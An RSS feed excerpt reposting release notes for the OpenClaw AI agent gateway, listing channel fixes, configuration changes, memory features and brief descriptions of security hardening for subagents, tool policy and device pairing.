<li>Channels/Telegram: persist native command metadata on target sessions so topic, helper, and ACP-bound slash commands keep their session metadata attached to the routed conversation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4168079108" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57548" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57548/hovercard" href="https://github.com/openclaw/openclaw/pull/57548">#57548</a>) Thanks @GaosCode.</li>
<li>Channels/native commands: keep validated native slash command replies visible in group chats while preserving explicit owner allowlists for command authorization. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344709307" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73672" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73672/hovercard" href="https://github.com/openclaw/openclaw/pull/73672">#73672</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Pairing/doctor: bootstrap <code>commands.ownerAllowFrom</code> from the first approved DM pairing when no command owner exists, and have doctor explain missing owners so privileged slash commands are not accidentally unusable after onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Telegram/exec: infer native exec approvers from <code>commands.ownerAllowFrom</code> and auto-enable the Telegram approval client when an owner is resolvable, so owner-only commands such as <code>/diagnostics</code> can be approved in Telegram without duplicate per-channel approver config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Auto-reply/session: carry the tail of user/assistant turns into the freshly-rotated transcript on silent in-reply session resets (compaction failure, role-ordering conflict) so direct-chat continuity survives the rebind. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319746928" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70853/hovercard" href="https://github.com/openclaw/openclaw/issues/70853">#70853</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320196607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70898" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70898/hovercard" href="https://github.com/openclaw/openclaw/pull/70898">#70898</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Skills: load grouped skill directories such as <code>skills/&lt;group&gt;/&lt;skill&gt;/SKILL.md</code> from configured skill roots while keeping grouped discovery capped for large directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163525640" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56915/hovercard" href="https://github.com/openclaw/openclaw/issues/56915">#56915</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332799995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72534" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72534/hovercard" href="https://github.com/openclaw/openclaw/pull/72534">#72534</a>) Thanks @ottodeng, @MoerAI, and @i010542.</li>
<li>Config: skip malformed non-string <code>env.vars</code> entries before env-reference checks, so config loading no longer crashes on JSON values like numbers or booleans. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053205994" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42402" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42402/hovercard" href="https://github.com/openclaw/openclaw/pull/42402">#42402</a>) Thanks @MiltonHeYan.</li>
<li>Docker Compose: default missing config and workspace bind mounts to <code>${HOME:-/tmp}/.openclaw</code> so manual compose runs do not create invalid empty-source volume specs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241483820" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64485" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64485/hovercard" href="https://github.com/openclaw/openclaw/pull/64485">#64485</a>) Thanks @jlapenna.</li>
<li>Agents/context engines: preserve the child agent's configured <code>agentDir</code> when subagent cleanup re-resolves a context engine, so <code>onSubagentEnded</code> hooks keep operating on the correct per-agent state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269702327" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67243" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67243/hovercard" href="https://github.com/openclaw/openclaw/pull/67243">#67243</a>) Thanks @jarimustonen.</li>
<li>Channels/WhatsApp: restrict pairing verification replies to real inbound user content, preventing unsolicited prompts from receipts, typing indicators, presence updates, and other non-message Baileys upserts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346092528" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73797/hovercard" href="https://github.com/openclaw/openclaw/issues/73797">#73797</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346437717" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73823" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73823/hovercard" href="https://github.com/openclaw/openclaw/pull/73823">#73823</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Configure/Ollama: show the configured Ollama model allowlist after Cloud only or Cloud + Local setup and skip slow per-model cloud metadata fetches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347480168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73995/hovercard" href="https://github.com/openclaw/openclaw/pull/73995">#73995</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Channels/WhatsApp: detect explicit group <code>@mentions</code> again when the bot's own E.164 is in <code>allowFrom</code>, so shared-number setups no longer skip group pings that directly mention the bot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091909998" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49317" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49317/hovercard" href="https://github.com/openclaw/openclaw/issues/49317">#49317</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342031370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73453/hovercard" href="https://github.com/openclaw/openclaw/pull/73453">#73453</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>WhatsApp/reliability: publish real transport-liveness into WhatsApp channel status and force earlier reconnects on silent transport stalls, so quiet healthy sessions stay connected while wedged sockets recover before the later remote 408 path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333644872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72656" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72656/hovercard" href="https://github.com/openclaw/openclaw/pull/72656">#72656</a>) Thanks @Sathvik-1007.</li>
<li>Core/channels: tighten selected runtime, media, and plugin edge-case handling while preserving existing behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Channels/WhatsApp: strip leaked plural tool-call XML wrappers on every WhatsApp-visible outbound path and keep channel error payloads out of WhatsApp chats. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329523309" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71830" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71830/hovercard" href="https://github.com/openclaw/openclaw/pull/71830">#71830</a>) Thanks @rubencu.</li>
<li>Agents/embedded-runner: inject the resolved OAuth bearer (and forward the run abort signal) on the boundary-aware embedded stream fallback so models that route through <code>openai-codex-responses</code> and other boundary-aware transports stop failing with <code>401 Unauthorized: Missing bearer or basic authentication in header</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343169386" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73559" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73559/hovercard" href="https://github.com/openclaw/openclaw/issues/73559">#73559</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343600007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73588" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73588/hovercard" href="https://github.com/openclaw/openclaw/pull/73588">#73588</a>) Thanks @openperf.</li>
<li>Telegram/gateway: bound outbound Bot API calls and cache bundled plugin alias lookup so slow Telegram sends or WSL2 filesystem scans no longer wedge gateway replies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348974196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74210" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74210/hovercard" href="https://github.com/openclaw/openclaw/pull/74210">#74210</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Configure/GitHub Copilot: reuse existing Copilot auth during configure and show the provider's manifest model catalog in the model picker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349704967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74276" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74276/hovercard" href="https://github.com/openclaw/openclaw/pull/74276">#74276</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Configure/models: keep the model picker scoped to the selected manifest provider and enable its bundled plugin before catalog lookup, so choosing GitHub Copilot no longer falls back to Ollama or skips the catalog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350379800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74322" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74322/hovercard" href="https://github.com/openclaw/openclaw/pull/74322">#74322</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Auto-reply/subagents: reject <code>/focus</code> from leaf subagents and scope fallback target resolution to the requesting subagent's children, so subagents cannot bind conversations outside their control boundary. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344094857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73613" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73613/hovercard" href="https://github.com/openclaw/openclaw/pull/73613">#73613</a>) Thanks @drobison00.</li>
<li>Gateway/startup: skip inherited workspace startup memory for sandboxed spawned sessions without real-workspace write access, so <code>/new</code> no longer preloads host workspace memory into isolated child runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344082702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73611" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73611/hovercard" href="https://github.com/openclaw/openclaw/pull/73611">#73611</a>) Thanks @drobison00.</li>
<li>Agents/tool policy: validate caller group IDs against session or spawned context before applying group-scoped tool policies or persisting gateway group metadata, so forged group IDs cannot unlock more permissive tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345261616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73720/hovercard" href="https://github.com/openclaw/openclaw/pull/73720">#73720</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</li>
<li>Commands: keep channel-prefixed owner allowlist entries scoped to matching providers so webchat command contexts cannot inherit external channel owners. Thanks @zsxsoft.</li>
<li>Auth/device pairing: bound bootstrap handoff token issuance, redemption, and approved pairing baselines to the documented per-role scope allowlist, so bootstrap approvals cannot persistently grant <code>operator.admin</code>, <code>operator.pairing</code>, or <code>node.exec</code> scopes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Providers/GitHub Copilot: support the GUI/RPC wizard device-code auth flow so onboarding from non-TTY clients (gateway RPC bridge, GUI wizards) completes instead of returning empty profiles. Dangerous-state handling now distinguishes <code>access_denied</code> and <code>expired_token</code> from transport errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340731383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73290" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73290/hovercard" href="https://github.com/openclaw/openclaw/pull/73290">#73290</a>) Thanks @indierawk2k2.</li>
<li>Installer/Linux: warn before switching an unwritable npm global prefix to <code>~/.npm-global</code>, then tell users to run future global updates with <code>npm i -g openclaw@latest</code> without <code>sudo</code> so npm keeps using the redirected user prefix. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067034134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44365/hovercard" href="https://github.com/openclaw/openclaw/issues/44365">#44365</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102245984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50479" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50479/hovercard" href="https://github.com/openclaw/openclaw/pull/50479">#50479</a>. Thanks @Sayeem3051.</li>
<li>Gateway/plugins: enable the native <code>require()</code> fast path on Windows for bundled plugin modules so plugin loading uses <code>require()</code> instead of Jiti's transform pipeline, reducing startup from ~39s to ~2s on typical 6-plugin setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288746847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68656/hovercard" href="https://github.com/openclaw/openclaw/issues/68656">#68656</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348588169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74173/hovercard" href="https://github.com/openclaw/openclaw/pull/74173">#74173</a>) Thanks @galiniliev.</li>
<li>macOS app: detect stale Gateway TLS certificate pins, automatically repair trusted Tailscale Serve rotations, and surface paired-but-disconnected Mac companion nodes so partial Gateway connections no longer look healthy. Thanks @guti.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.4.29-beta.2]]></title>
<description><![CDATA[2026.4.29
Highlights

Messaging and automation get active-run steering by default, visible-reply enforcement, spawned subagent routing metadata, and opt-in follow-up commitments for heartbeat-delivered reminders. Thanks @vincentkoc, @scoootscooob, @samzong, and @vignesh07.
Memory grows into a peo...]]></description>
<link>https://tsecurity.de/de/3478363/downloads/openclaw-2026429-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3478363/downloads/openclaw-2026429-beta2/</guid>
<pubDate>Thu, 30 Apr 2026 18:46:23 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.29</h2>
<h3>Highlights</h3>
<ul>
<li>Messaging and automation get active-run steering by default, visible-reply enforcement, spawned subagent routing metadata, and opt-in follow-up commitments for heartbeat-delivered reminders. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vignesh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vignesh07">@vignesh07</a>.</li>
<li>Memory grows into a people-aware wiki with provenance views, per-conversation Active Memory filters, partial recall on timeout, and bounded REM preview diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quengh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quengh">@quengh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Provider/model coverage expands with NVIDIA onboarding/catalogs plus faster manifest-backed model/auth paths, Bedrock Opus 4.7 thinking parity, and safer Codex/OpenAI-compatible replay and streaming behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prasad-yashdeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prasad-yashdeep">@prasad-yashdeep</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/woodhouse-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/woodhouse-bot">@woodhouse-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LyHug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LyHug">@LyHug</a>.</li>
<li>Gateway and packaged-plugin reliability focuses on slow-host startup, reusable model catalogs, event-loop readiness diagnostics, runtime-dependency repair, stale-session recovery, and version-scoped update caches. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lpendeavors/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lpendeavors">@lpendeavors</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DerFlash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DerFlash">@DerFlash</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhsmith409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhsmith409">@jhsmith409</a>.</li>
<li>Channel fixes cluster around Slack Block Kit limits, Telegram proxy/webhook/polling/send resilience, Discord startup/rate-limit handling, WhatsApp delivery/liveness, and Microsoft Teams/Matrix/Feishu edge cases. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/djgeorg3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/djgeorg3">@djgeorg3</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dseravalli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dseravalli">@dseravalli</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nklock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nklock">@nklock</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>.</li>
<li>Security and operations add OpenGrep scanning, sharper GHSA triage policy, safer exec/pairing/owner-scope handling, Docker/onboarding automation, and web-fetch IPv6 ULA opt-in for trusted proxy stacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinjimz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinjimz">@jinjimz</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Security/tools: configured tool sections (<code>tools.exec</code>, <code>tools.fs</code>) no longer implicitly widen restrictive profiles (<code>messaging</code>, <code>minimal</code>). Users who need those tools under a restricted profile must add explicit <code>alsoAllow</code> entries; a startup warning identifies affected configs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078726004" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47487/hovercard" href="https://github.com/openclaw/openclaw/issues/47487">#47487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/commitments: add opt-in inferred follow-up commitments with hidden batched extraction, per-agent/per-channel scoping, heartbeat delivery, CLI management, a simple <code>commitments.enabled</code>/<code>commitments.maxPerDay</code> config, and heartbeat-interval due-time clamping so magical check-ins do not echo immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348684831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74189" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74189/hovercard" href="https://github.com/openclaw/openclaw/pull/74189">#74189</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vignesh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vignesh07">@vignesh07</a>.</li>
<li>Messages/queue: make <code>steer</code> drain all pending Pi steering messages at the next model boundary, keep legacy one-at-a-time steering as <code>queue</code>, and add a dedicated steering queue docs page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Messages/queue: default active-run queueing to <code>steer</code> with a 500ms followup fallback debounce, and document the queue modes, precedence, and drop policies on the command queue page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Messages: add global <code>messages.visibleReplies</code> so operators can require visible output to go through <code>message(action=send)</code> for any source chat, while <code>messages.groupChat.visibleReplies</code> stays available as the group/channel override. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
<li>Gateway/events: surface <code>spawnedBy</code> on subagent chat and agent broadcast payloads so clients can route child session events without an extra session lookup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226049569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63244" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63244/hovercard" href="https://github.com/openclaw/openclaw/pull/63244">#63244</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Memory/wiki: add agent-facing people wiki metadata, canonical aliases, person cards, relationship graphs, privacy/provenance reports, evidence-kind drilldown, and search modes for person lookup, question routing, source evidence, and raw claims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: add optional per-conversation <code>allowedChatIds</code> and <code>deniedChatIds</code> filters so operators can enable recall only for selected direct, group, or channel conversations while keeping broad sessions skipped. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280170574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67977" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67977/hovercard" href="https://github.com/openclaw/openclaw/pull/67977">#67977</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quengh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quengh">@quengh</a>.</li>
<li>Active Memory: return bounded partial recall summaries when the hidden memory sub-agent times out, including the default temporary-transcript path, so useful recovered context is not discarded. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340395145" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73219/hovercard" href="https://github.com/openclaw/openclaw/pull/73219">#73219</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>.</li>
